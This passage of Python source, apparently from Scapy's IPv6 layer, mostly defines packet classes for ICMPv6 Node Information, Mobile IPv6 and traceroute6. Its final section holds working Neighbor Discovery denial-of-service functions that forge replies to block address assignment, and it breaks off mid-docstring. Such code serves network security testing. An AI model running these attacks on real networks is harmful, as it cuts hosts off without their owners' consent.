[ (ttl, ip6), ... ]) # (4, [ (ttl, ip4), ... ]) # (2, [ttl, dns_names]) : dns_names is one string that contains # all the DNS names. Internally it is kept ready to be sent # (undissected). i2repr() decode it for user. This is to # make build after dissection bijective. # # I also merged getfield() and m2i(), and addfield() and i2m(). class NIReplyDataField(StrField): def i2h(self, pkt, x): if x is None: return x t, val = x if t == 2: ttl, dnsnames = val val = [ttl] + dnsrepr2names(dnsnames) return val def h2i(self, pkt, x): qtype = 0 # We will decode it as string if not # overridden through 'qtype' in pkt # No user hint, let's use 'qtype' value for that purpose if not isinstance(x, tuple): if pkt is not None: qtype = pkt.qtype else: qtype = x[0] x = x[1] # From that point on, x is the value (second element of the tuple) if qtype == 2: # DNS name if isinstance(x, (str, bytes)): # listify the string x = [x] if isinstance(x, list): x = [val.encode() if isinstance(val, str) else val for val in x] # noqa: E501 if x and isinstance(x[0], six.integer_types): ttl = x[0] names = x[1:] else: ttl = 0 names = x return (2, [ttl, names2dnsrepr(names)]) elif qtype in [3, 4]: # IPv4 or IPv6 addr if not isinstance(x, list): x = [x] # User directly provided an IP, instead of list def fixvalue(x): # List elements are not tuples, user probably # omitted ttl value : we will use 0 instead if not isinstance(x, tuple): x = (0, x) # Decode bytes if six.PY3 and isinstance(x[1], bytes): x = (x[0], x[1].decode()) return x return (qtype, [fixvalue(d) for d in x]) return (qtype, x) def addfield(self, pkt, s, val): t, tmp = val if tmp is None: tmp = b"" if t == 2: ttl, dnsstr = tmp return s + struct.pack("!I", ttl) + dnsstr elif t == 3: return s + b"".join(map(lambda x_y1: struct.pack("!I", x_y1[0]) + inet_pton(socket.AF_INET6, x_y1[1]), tmp)) # noqa: E501 elif t == 4: return s + b"".join(map(lambda x_y2: struct.pack("!I", x_y2[0]) + inet_pton(socket.AF_INET, x_y2[1]), tmp)) # noqa: E501 else: return s + tmp def getfield(self, pkt, s): code = getattr(pkt, "code") if code != 0: return s, (0, b"") qtype = getattr(pkt, "qtype") if qtype == 0: # NOOP return s, (0, b"") elif qtype == 2: if len(s) < 4: return s, (0, b"") ttl = struct.unpack("!I", s[:4])[0] return b"", (2, [ttl, s[4:]]) elif qtype == 3: # IPv6 addresses 
with TTLs # XXX TODO : get the real length res = [] while len(s) >= 20: # 4 + 16 ttl = struct.unpack("!I", s[:4])[0] ip = inet_ntop(socket.AF_INET6, s[4:20]) res.append((ttl, ip)) s = s[20:] return s, (3, res) elif qtype == 4: # IPv4 addresses with TTLs # XXX TODO : get the real length res = [] while len(s) >= 8: # 4 + 4 ttl = struct.unpack("!I", s[:4])[0] ip = inet_ntop(socket.AF_INET, s[4:8]) res.append((ttl, ip)) s = s[8:] return s, (4, res) else: # XXX TODO : implement me and deal with real length return b"", (0, s) def i2repr(self, pkt, x): if x is None: return "[]" if isinstance(x, tuple) and len(x) == 2: t, val = x if t == 2: # DNS names ttl, tmp_len = val tmp_len = dnsrepr2names(tmp_len) names_list = (plain_str(name) for name in tmp_len) return "ttl:%d %s" % (ttl, ",".join(names_list)) elif t == 3 or t == 4: return "[ %s ]" % (", ".join(map(lambda x_y: "(%d, %s)" % (x_y[0], x_y[1]), val))) # noqa: E501 return repr(val) return repr(x) # XXX should not happen # By default, sent responses have code set to 0 (successful) class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6): name = "ICMPv6 Node Information Reply - NOOP Reply" fields_desc = [ByteEnumField("type", 140, icmp6types), ByteEnumField("code", 0, _nireply_code), XShortField("cksum", None), ShortEnumField("qtype", 0, icmp6_niqtypes), BitField("unused", 0, 10), FlagsField("flags", 0, 6, "TACLSG"), NonceField("nonce", None), NIReplyDataField("data", None)] class ICMPv6NIReplyName(ICMPv6NIReplyNOOP): name = "ICMPv6 Node Information Reply - Node Names" qtype = 2 class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP): name = "ICMPv6 Node Information Reply - IPv6 addresses" qtype = 3 class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP): name = "ICMPv6 Node Information Reply - IPv4 addresses" qtype = 4 class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP): name = "ICMPv6 Node Information Reply - Responder refuses to supply answer" code = 1 class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP): name = "ICMPv6 Node Information Reply - Qtype unknown to the responder" code = 2 def _niquery_guesser(p): cls = conf.raw_layer type = orb(p[0]) if type == 139: # Node Info Query specific stuff if len(p) > 6: qtype, = struct.unpack("!H", p[4:6]) cls = {0: ICMPv6NIQueryNOOP, 2: ICMPv6NIQueryName, 3: ICMPv6NIQueryIPv6, 4: ICMPv6NIQueryIPv4}.get(qtype, conf.raw_layer) elif type == 140: # Node Info Reply specific stuff code = orb(p[1]) if code == 0: if len(p) > 6: qtype, = struct.unpack("!H", p[4:6]) cls = {2: ICMPv6NIReplyName, 3: ICMPv6NIReplyIPv6, 4: ICMPv6NIReplyIPv4}.get(qtype, ICMPv6NIReplyNOOP) elif code == 1: cls = ICMPv6NIReplyRefuse elif code == 2: cls = ICMPv6NIReplyUnknown return cls ############################################################################# ############################################################################# # Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) # ############################################################################# ############################################################################# # Mobile IPv6 ICMPv6 related classes class ICMPv6HAADRequest(_ICMPv6): name = 'ICMPv6 Home Agent Address Discovery Request' fields_desc = [ByteEnumField("type", 144, icmp6types), ByteField("code", 0), XShortField("cksum", None), XShortField("id", None), BitEnumField("R", 1, 1, {1: 'MR'}), XBitField("res", 0, 15)] def hashret(self): return struct.pack("!H", self.id) + self.payload.hashret() class ICMPv6HAADReply(_ICMPv6): name = 'ICMPv6 Home Agent Address Discovery Reply' fields_desc = [ByteEnumField("type", 145, icmp6types), 
ByteField("code", 0), XShortField("cksum", None), XShortField("id", None), BitEnumField("R", 1, 1, {1: 'MR'}), XBitField("res", 0, 15), IP6ListField('addresses', None)] def hashret(self): return struct.pack("!H", self.id) + self.payload.hashret() def answers(self, other): if not isinstance(other, ICMPv6HAADRequest): return 0 return self.id == other.id class ICMPv6MPSol(_ICMPv6): name = 'ICMPv6 Mobile Prefix Solicitation' fields_desc = [ByteEnumField("type", 146, icmp6types), ByteField("code", 0), XShortField("cksum", None), XShortField("id", None), XShortField("res", 0)] def _hashret(self): return struct.pack("!H", self.id) class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6): name = 'ICMPv6 Mobile Prefix Advertisement' fields_desc = [ByteEnumField("type", 147, icmp6types), ByteField("code", 0), XShortField("cksum", None), XShortField("id", None), BitEnumField("flags", 2, 2, {2: 'M', 1: 'O'}), XBitField("res", 0, 14)] def hashret(self): return struct.pack("!H", self.id) def answers(self, other): return isinstance(other, ICMPv6MPSol) # Mobile IPv6 Options classes _mobopttypes = {2: "Binding Refresh Advice", 3: "Alternate Care-of Address", 4: "Nonce Indices", 5: "Binding Authorization Data", 6: "Mobile Network Prefix (RFC3963)", 7: "Link-Layer Address (RFC4068)", 8: "Mobile Node Identifier (RFC4283)", 9: "Mobility Message Authentication (RFC4285)", 10: "Replay Protection (RFC4285)", 11: "CGA Parameters Request (RFC4866)", 12: "CGA Parameters (RFC4866)", 13: "Signature (RFC4866)", 14: "Home Keygen Token (RFC4866)", 15: "Care-of Test Init (RFC4866)", 16: "Care-of Test (RFC4866)"} class _MIP6OptAlign(Packet): """ Mobile IPv6 options have alignment requirements of the form x*n+y. This class is inherited by all MIPv6 options to help in computing the required Padding for that option, i.e. the need for a Pad1 or PadN option before it. They only need to provide x and y as class parameters. 
(x=0 and y=0 are used when no alignment is required)""" __slots__ = ["x", "y"] def alignment_delta(self, curpos): x = self.x y = self.y if x == 0 and y == 0: return 0 delta = x * ((curpos - y + x - 1) // x) + y - curpos return delta def extract_padding(self, p): return b"", p class MIP6OptBRAdvice(_MIP6OptAlign): name = 'Mobile IPv6 Option - Binding Refresh Advice' fields_desc = [ByteEnumField('otype', 2, _mobopttypes), ByteField('olen', 2), ShortField('rinter', 0)] x = 2 y = 0 # alignment requirement: 2n class MIP6OptAltCoA(_MIP6OptAlign): name = 'MIPv6 Option - Alternate Care-of Address' fields_desc = [ByteEnumField('otype', 3, _mobopttypes), ByteField('olen', 16), IP6Field("acoa", "::")] x = 8 y = 6 # alignment requirement: 8n+6 class MIP6OptNonceIndices(_MIP6OptAlign): name = 'MIPv6 Option - Nonce Indices' fields_desc = [ByteEnumField('otype', 4, _mobopttypes), ByteField('olen', 16), ShortField('hni', 0), ShortField('coni', 0)] x = 2 y = 0 # alignment requirement: 2n class MIP6OptBindingAuthData(_MIP6OptAlign): name = 'MIPv6 Option - Binding Authorization Data' fields_desc = [ByteEnumField('otype', 5, _mobopttypes), ByteField('olen', 16), BitField('authenticator', 0, 96)] x = 8 y = 2 # alignment requirement: 8n+2 class MIP6OptMobNetPrefix(_MIP6OptAlign): # NEMO - RFC 3963 name = 'NEMO Option - Mobile Network Prefix' fields_desc = [ByteEnumField("otype", 6, _mobopttypes), ByteField("olen", 18), ByteField("reserved", 0), ByteField("plen", 64), IP6Field("prefix", "::")] x = 8 y = 4 # alignment requirement: 8n+4 class MIP6OptLLAddr(_MIP6OptAlign): # Sect 6.4.4 of RFC 4068 name = "MIPv6 Option - Link-Layer Address (MH-LLA)" fields_desc = [ByteEnumField("otype", 7, _mobopttypes), ByteField("olen", 7), ByteEnumField("ocode", 2, _rfc4068_lla_optcode), ByteField("pad", 0), MACField("lla", ETHER_ANY)] # Only support ethernet x = 0 y = 0 # alignment requirement: none class MIP6OptMNID(_MIP6OptAlign): # RFC 4283 name = "MIPv6 Option - Mobile Node Identifier" fields_desc = [ByteEnumField("otype", 8, _mobopttypes), FieldLenField("olen", None, length_of="id", fmt="B", adjust=lambda pkt, x: x + 1), ByteEnumField("subtype", 1, {1: "NAI"}), StrLenField("id", "", length_from=lambda pkt: pkt.olen - 1)] x = 0 y = 0 # alignment requirement: none # We only support decoding and basic build. Automatic HMAC computation is # too much work for our current needs. It is left to the user (I mean ... # you). --arno class MIP6OptMsgAuth(_MIP6OptAlign): # RFC 4285 (Sect. 5) name = "MIPv6 Option - Mobility Message Authentication" fields_desc = [ByteEnumField("otype", 9, _mobopttypes), FieldLenField("olen", None, length_of="authdata", fmt="B", adjust=lambda pkt, x: x + 5), ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option", # noqa: E501 2: "MN-AAA authentication mobility option"}), # noqa: E501 IntField("mspi", None), StrLenField("authdata", "A" * 12, length_from=lambda pkt: pkt.olen - 5)] x = 4 y = 1 # alignment requirement: 4n+1 # Extracted from RFC 1305 (NTP) : # NTP timestamps are represented as a 64-bit unsigned fixed-point number, # in seconds relative to 0h on 1 January 1900. The integer part is in the # first 32 bits and the fraction part in the last 32 bits. 
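# Worked example (illustrative addition, not from the original source): how a
# 64-bit NTP fixed-point value splits into integer seconds and a fraction,
# which is what the field below renders. 2208988800 is the conventional
# 1900-to-1970 epoch offset; note that i2repr() below uses its own delta
# constant, which is kept unchanged here.
#
#   >>> ntp = 0xDCD2B1E580000000                # arbitrary example value
#   >>> secs = (ntp >> 32) - 2208988800         # seconds since the Unix epoch
#   >>> frac = (ntp & 0xffffffff) / 2.0**32     # 0.5 for this example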
class NTPTimestampField(LongField): def i2repr(self, pkt, x): if x < ((50 * 31536000) << 32): return "Some date a few decades ago (%d)" % x # delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to # January 1st 1970 : delta = -2209075761 i = int(x >> 32) j = float(x & 0xffffffff) * 2.0**-32 res = i + j + delta t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(res)) return "%s (%d)" % (t, x) class MIP6OptReplayProtection(_MIP6OptAlign): # RFC 4285 (Sect. 6) name = "MIPv6 option - Replay Protection" fields_desc = [ByteEnumField("otype", 10, _mobopttypes), ByteField("olen", 8), NTPTimestampField("timestamp", 0)] x = 8 y = 2 # alignment requirement: 8n+2 class MIP6OptCGAParamsReq(_MIP6OptAlign): # RFC 4866 (Sect. 5.6) name = "MIPv6 option - CGA Parameters Request" fields_desc = [ByteEnumField("otype", 11, _mobopttypes), ByteField("olen", 0)] x = 0 y = 0 # alignment requirement: none # XXX TODO: deal with CGA param fragmentation and build of defragmented # XXX version. Passing of a big CGAParam structure should be # XXX simplified. Make it hold packets, by the way --arno class MIP6OptCGAParams(_MIP6OptAlign): # RFC 4866 (Sect. 5.1) name = "MIPv6 option - CGA Parameters" fields_desc = [ByteEnumField("otype", 12, _mobopttypes), FieldLenField("olen", None, length_of="cgaparams", fmt="B"), StrLenField("cgaparams", "", length_from=lambda pkt: pkt.olen)] x = 0 y = 0 # alignment requirement: none class MIP6OptSignature(_MIP6OptAlign): # RFC 4866 (Sect. 5.2) name = "MIPv6 option - Signature" fields_desc = [ByteEnumField("otype", 13, _mobopttypes), FieldLenField("olen", None, length_of="sig", fmt="B"), StrLenField("sig", "", length_from=lambda pkt: pkt.olen)] x = 0 y = 0 # alignment requirement: none class MIP6OptHomeKeygenToken(_MIP6OptAlign): # RFC 4866 (Sect. 5.3) name = "MIPv6 option - Home Keygen Token" fields_desc = [ByteEnumField("otype", 14, _mobopttypes), FieldLenField("olen", None, length_of="hkt", fmt="B"), StrLenField("hkt", "", length_from=lambda pkt: pkt.olen)] x = 0 y = 0 # alignment requirement: none class MIP6OptCareOfTestInit(_MIP6OptAlign): # RFC 4866 (Sect. 5.4) name = "MIPv6 option - Care-of Test Init" fields_desc = [ByteEnumField("otype", 15, _mobopttypes), ByteField("olen", 0)] x = 0 y = 0 # alignment requirement: none class MIP6OptCareOfTest(_MIP6OptAlign): # RFC 4866 (Sect. 
5.5) name = "MIPv6 option - Care-of Test" fields_desc = [ByteEnumField("otype", 16, _mobopttypes), FieldLenField("olen", None, length_of="cokt", fmt="B"), StrLenField("cokt", b'\x00' * 8, length_from=lambda pkt: pkt.olen)] x = 0 y = 0 # alignment requirement: none class MIP6OptUnknown(_MIP6OptAlign): name = 'Scapy6 - Unknown Mobility Option' fields_desc = [ByteEnumField("otype", 6, _mobopttypes), FieldLenField("olen", None, length_of="odata", fmt="B"), StrLenField("odata", "", length_from=lambda pkt: pkt.olen)] x = 0 y = 0 # alignment requirement: none @classmethod def dispatch_hook(cls, _pkt=None, *_, **kargs): if _pkt: o = orb(_pkt[0]) # Option type if o in moboptcls: return moboptcls[o] return cls moboptcls = {0: Pad1, 1: PadN, 2: MIP6OptBRAdvice, 3: MIP6OptAltCoA, 4: MIP6OptNonceIndices, 5: MIP6OptBindingAuthData, 6: MIP6OptMobNetPrefix, 7: MIP6OptLLAddr, 8: MIP6OptMNID, 9: MIP6OptMsgAuth, 10: MIP6OptReplayProtection, 11: MIP6OptCGAParamsReq, 12: MIP6OptCGAParams, 13: MIP6OptSignature, 14: MIP6OptHomeKeygenToken, 15: MIP6OptCareOfTestInit, 16: MIP6OptCareOfTest} # Main Mobile IPv6 Classes mhtypes = {0: 'BRR', 1: 'HoTI', 2: 'CoTI', 3: 'HoT', 4: 'CoT', 5: 'BU', 6: 'BA', 7: 'BE', 8: 'Fast BU', 9: 'Fast BA', 10: 'Fast NA'} # From http://www.iana.org/assignments/mobility-parameters bastatus = {0: 'Binding Update accepted', 1: 'Accepted but prefix discovery necessary', 128: 'Reason unspecified', 129: 'Administratively prohibited', 130: 'Insufficient resources', 131: 'Home registration not supported', 132: 'Not home subnet', 133: 'Not home agent for this mobile node', 134: 'Duplicate Address Detection failed', 135: 'Sequence number out of window', 136: 'Expired home nonce index', 137: 'Expired care-of nonce index', 138: 'Expired nonces', 139: 'Registration type change disallowed', 140: 'Mobile Router Operation not permitted', 141: 'Invalid Prefix', 142: 'Not Authorized for Prefix', 143: 'Forwarding Setup failed (prefixes missing)', 144: 'MIPV6-ID-MISMATCH', 145: 'MIPV6-MESG-ID-REQD', 146: 'MIPV6-AUTH-FAIL', 147: 'Permanent home keygen token unavailable', 148: 'CGA and signature verification failed', 149: 'Permanent home keygen token exists', 150: 'Non-null home nonce index expected'} class _MobilityHeader(Packet): name = 'Dummy IPv6 Mobility Header' overload_fields = {IPv6: {"nh": 135}} def post_build(self, p, pay): p += pay tmp_len = self.len if self.len is None: tmp_len = (len(p) - 8) // 8 p = p[:1] + struct.pack("B", tmp_len) + p[2:] if self.cksum is None: cksum = in6_chksum(135, self.underlayer, p) else: cksum = self.cksum p = p[:4] + struct.pack("!H", cksum) + p[6:] return p class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg name = "IPv6 Mobility Header - Generic Message" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), ByteEnumField("mhtype", None, mhtypes), ByteField("res", None), XShortField("cksum", None), StrLenField("msg", b"\x00" * 2, length_from=lambda pkt: 8 * pkt.len - 6)] class MIP6MH_BRR(_MobilityHeader): name = "IPv6 Mobility Header - Binding Refresh Request" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), ByteEnumField("mhtype", 0, mhtypes), ByteField("res", None), XShortField("cksum", None), ShortField("res2", None), _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], MIP6OptUnknown, 8, length_from=lambda pkt: 8 * pkt.len)] overload_fields = {IPv6: {"nh": 135}} def hashret(self): # Hack: BRR, BU and BA have the same hashret that returns the same 
# value b"\x00\x08\x09" (concatenation of mhtypes). This is # because we need match BA with BU and BU with BRR. --arno return b"\x00\x08\x09" class MIP6MH_HoTI(_MobilityHeader): name = "IPv6 Mobility Header - Home Test Init" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), ByteEnumField("mhtype", 1, mhtypes), ByteField("res", None), XShortField("cksum", None), StrFixedLenField("reserved", b"\x00" * 2, 2), StrFixedLenField("cookie", b"\x00" * 8, 8), _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], MIP6OptUnknown, 16, length_from=lambda pkt: 8 * (pkt.len - 1))] # noqa: E501 overload_fields = {IPv6: {"nh": 135}} def hashret(self): return bytes_encode(self.cookie) class MIP6MH_CoTI(MIP6MH_HoTI): name = "IPv6 Mobility Header - Care-of Test Init" mhtype = 2 def hashret(self): return bytes_encode(self.cookie) class MIP6MH_HoT(_MobilityHeader): name = "IPv6 Mobility Header - Home Test" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), ByteEnumField("mhtype", 3, mhtypes), ByteField("res", None), XShortField("cksum", None), ShortField("index", None), StrFixedLenField("cookie", b"\x00" * 8, 8), StrFixedLenField("token", b"\x00" * 8, 8), _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], MIP6OptUnknown, 24, length_from=lambda pkt: 8 * (pkt.len - 2))] # noqa: E501 overload_fields = {IPv6: {"nh": 135}} def hashret(self): return bytes_encode(self.cookie) def answers(self, other): if (isinstance(other, MIP6MH_HoTI) and self.cookie == other.cookie): return 1 return 0 class MIP6MH_CoT(MIP6MH_HoT): name = "IPv6 Mobility Header - Care-of Test" mhtype = 4 def hashret(self): return bytes_encode(self.cookie) def answers(self, other): if (isinstance(other, MIP6MH_CoTI) and self.cookie == other.cookie): return 1 return 0 class LifetimeField(ShortField): def i2repr(self, pkt, x): return "%d sec" % (4 * x) class MIP6MH_BU(_MobilityHeader): name = "IPv6 Mobility Header - Binding Update" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501 ByteEnumField("mhtype", 5, mhtypes), ByteField("res", None), XShortField("cksum", None), XShortField("seq", None), # TODO: ShortNonceField FlagsField("flags", "KHA", 7, "PRMKLHA"), XBitField("reserved", 0, 9), LifetimeField("mhtime", 3), # unit == 4 seconds _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], MIP6OptUnknown, 12, length_from=lambda pkt: 8 * pkt.len - 4)] # noqa: E501 overload_fields = {IPv6: {"nh": 135}} def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() return b"\x00\x08\x09" def answers(self, other): if isinstance(other, MIP6MH_BRR): return 1 return 0 class MIP6MH_BA(_MobilityHeader): name = "IPv6 Mobility Header - Binding ACK" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501 ByteEnumField("mhtype", 6, mhtypes), ByteField("res", None), XShortField("cksum", None), ByteEnumField("status", 0, bastatus), FlagsField("flags", "K", 3, "PRK"), XBitField("res2", None, 5), XShortField("seq", None), # TODO: ShortNonceField XShortField("mhtime", 0), # unit == 4 seconds _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], MIP6OptUnknown, 12, length_from=lambda pkt: 8 * pkt.len - 4)] # noqa: E501 overload_fields = {IPv6: {"nh": 135}} 
def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() return b"\x00\x08\x09" def answers(self, other): if (isinstance(other, MIP6MH_BU) and other.mhtype == 5 and self.mhtype == 6 and other.flags & 0x1 and # Ack request flags is set self.seq == other.seq): return 1 return 0 _bestatus = {1: 'Unknown binding for Home Address destination option', 2: 'Unrecognized MH Type value'} # TODO: match Binding Error to its stimulus class MIP6MH_BE(_MobilityHeader): name = "IPv6 Mobility Header - Binding Error" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501 ByteEnumField("mhtype", 7, mhtypes), ByteField("res", 0), XShortField("cksum", None), ByteEnumField("status", 0, _bestatus), ByteField("reserved", 0), IP6Field("ha", "::"), _OptionsField("options", [], MIP6OptUnknown, 24, length_from=lambda pkt: 8 * (pkt.len - 2))] # noqa: E501 overload_fields = {IPv6: {"nh": 135}} _mip6_mhtype2cls = {0: MIP6MH_BRR, 1: MIP6MH_HoTI, 2: MIP6MH_CoTI, 3: MIP6MH_HoT, 4: MIP6MH_CoT, 5: MIP6MH_BU, 6: MIP6MH_BA, 7: MIP6MH_BE} ############################################################################# ############################################################################# # Traceroute6 # ############################################################################# ############################################################################# class AS_resolver6(AS_resolver_riswhois): def _resolve_one(self, ip): """ overloaded version to provide a Whois resolution on the embedded IPv4 address if the address is 6to4 or Teredo. Otherwise, the native IPv6 address is passed. """ if in6_isaddr6to4(ip): # for 6to4, use embedded @ tmp = inet_pton(socket.AF_INET6, ip) addr = inet_ntop(socket.AF_INET, tmp[2:6]) elif in6_isaddrTeredo(ip): # for Teredo, use mapped address addr = teredoAddrExtractInfo(ip)[2] else: addr = ip _, asn, desc = AS_resolver_riswhois._resolve_one(self, addr) if asn.startswith("AS"): try: asn = int(asn[2:]) except ValueError: pass return ip, asn, desc class TracerouteResult6(TracerouteResult): __slots__ = [] def show(self): return self.make_table(lambda s, r: (s.sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 ! 
# noqa: E501 s.hlim, r.sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}" + # noqa: E501 "{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}" + # noqa: E501 "{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}" + # noqa: E501 "{ICMPv6EchoReply:%ir,type%}"))) # noqa: E501 def get_trace(self): trace = {} for s, r in self.res: if IPv6 not in s: continue d = s[IPv6].dst if d not in trace: trace[d] = {} t = not (ICMPv6TimeExceeded in r or ICMPv6DestUnreach in r or ICMPv6PacketTooBig in r or ICMPv6ParamProblem in r) trace[d][s[IPv6].hlim] = r[IPv6].src, t for k in six.itervalues(trace): try: m = min(x for x, y in six.iteritems(k) if y[1]) except ValueError: continue for l in list(k): # use list(): k is modified in the loop if l > m: del k[l] return trace def graph(self, ASres=AS_resolver6(), **kargs): TracerouteResult.graph(self, ASres=ASres, **kargs) @conf.commands.register def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(), l4=None, timeout=2, verbose=None, **kargs): """Instant TCP traceroute using IPv6 traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None """ if verbose is None: verbose = conf.verb if l4 is None: a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / TCP(seq=RandInt(), sport=sport, dport=dport), # noqa: E501 timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs) # noqa: E501 else: a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / l4, timeout=timeout, verbose=verbose, **kargs) a = TracerouteResult6(a.res) if verbose: a.display() return a, b ############################################################################# ############################################################################# # Sockets # ############################################################################# ############################################################################# class L3RawSocket6(L3RawSocket): def __init__(self, type=ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0): # noqa: E501 L3RawSocket.__init__(self, type, filter, iface, promisc) # NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292) # noqa: E501 self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # noqa: E501 self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501 def IPv6inIP(dst='203.178.135.36', src=None): _IPv6inIP.dst = dst _IPv6inIP.src = src if not conf.L3socket == _IPv6inIP: _IPv6inIP.cls = conf.L3socket else: del(conf.L3socket) return _IPv6inIP class _IPv6inIP(SuperSocket): dst = '127.0.0.1' src = None cls = None def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args): # noqa: E501 SuperSocket.__init__(self, family, type, proto) self.worker = self.cls(**args) def set(self, dst, src=None): _IPv6inIP.src = src _IPv6inIP.dst = dst def nonblock_recv(self): p = self.worker.nonblock_recv() return self._recv(p) def recv(self, x): p = self.worker.recv(x) return self._recv(p, x) def _recv(self, p, x=MTU): if p is None: return p elif isinstance(p, IP): # TODO: verify checksum if p.src == self.dst and p.proto == socket.IPPROTO_IPV6: if isinstance(p.payload, IPv6): return p.payload return p def send(self, x): return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6) / x) # noqa: E501 ############################################################################# ############################################################################# # Neighbor Discovery Protocol Attacks # 
############################################################################# ############################################################################# def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None, tgt_filter=None, reply_mac=None): """ Internal generic helper accepting a specific callback as first argument, for NS or NA reply. See the two specific functions below. """ def is_request(req, mac_src_filter, tgt_filter): """ Check if packet req is a request """ # Those simple checks are based on Section 5.4.2 of RFC 4862 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req): return 0 # Get and compare the MAC address mac_src = req[Ether].src if mac_src_filter and mac_src != mac_src_filter: return 0 # Source must be the unspecified address if req[IPv6].src != "::": return 0 # Check destination is the link-local solicited-node multicast # address associated with target address in received NS tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt) if tgt_filter and tgt != tgt_filter: return 0 received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst) expected_snma = in6_getnsma(tgt) if received_snma != expected_snma: return 0 return 1 if not iface: iface = conf.iface # To prevent sniffing our own traffic if not reply_mac: reply_mac = get_if_hwaddr(iface) sniff_filter = "icmp6 and not ether src %s" % reply_mac sniff(store=0, filter=sniff_filter, lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter), prn=lambda x: reply_callback(x, reply_mac, iface), iface=iface) def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None, reply_mac=None): """ Perform the DAD DoS attack using NS described in section 4.1.3 of RFC 3756. This is done by listening incoming NS messages sent from the unspecified address and sending a NS reply for the target address, leading the peer to believe that another node is also performing DAD for that address. By default, the fake NS sent to create the DoS uses: - as target address the target address found in received NS. - as IPv6 source address: the unspecified address (::). - as IPv6 destination address: the link-local solicited-node multicast address derived from the target address in received NS. - the mac address of the interface as source (or reply_mac, see below). - the multicast mac address derived from the solicited node multicast address used as IPv6 destination address. Following arguments can be used to change the behavior: iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. If None is provided conf.iface is used. mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. Only NS messages received from this source will trigger replies. This allows limiting the effects of the DoS to a single target by filtering on its mac address. The default value is None: the DoS is not limited to a specific mac address. tgt_filter: Same as previous but for a specific target IPv6 address for received NS. If the target address in the NS message (not the IPv6 destination address) matches that address, then a fake reply will be sent, i.e. the emitter will be a target of the DoS. reply_mac: allow specifying a specific source mac address for the reply, i.e. to prevent the use of the mac address of the interface. 
""" def ns_reply_callback(req, reply_mac, iface): """ Callback that reply to a NS by sending a similar NS """ # Let's build a reply and send it mac = req[Ether].src dst = req[IPv6].dst tgt = req[ICMPv6ND_NS].tgt rep = Ether(src=reply_mac) / IPv6(src="::", dst=dst) / ICMPv6ND_NS(tgt=tgt) # noqa: E501 sendp(rep, iface=iface, verbose=0) print("Reply NS for target address %s (received from %s)" % (tgt, mac)) _NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter, tgt_filter, reply_mac) def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None, reply_mac=None): """ Perform the DAD DoS attack using NS described in section 4.1.3 of RFC 3756. This is done by listening incoming NS messages *sent from the unspecified address* and sending a NA reply for the target address, leading the peer to believe that another node is also performing DAD for that address. By default, the fake NA sent to create the DoS uses: - as target address the target address found in received NS. - as IPv6 source address: the target address found in received NS. - as IPv6 destination address: the link-local solicited-node multicast address derived from the target address in received NS. - the mac address of the interface as source (or reply_mac, see below). - the multicast mac address derived from the solicited node multicast address used as IPv6 destination address. - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled with the mac address used as source of the NA. Following arguments can be used to change the behavior: iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. If None is provided 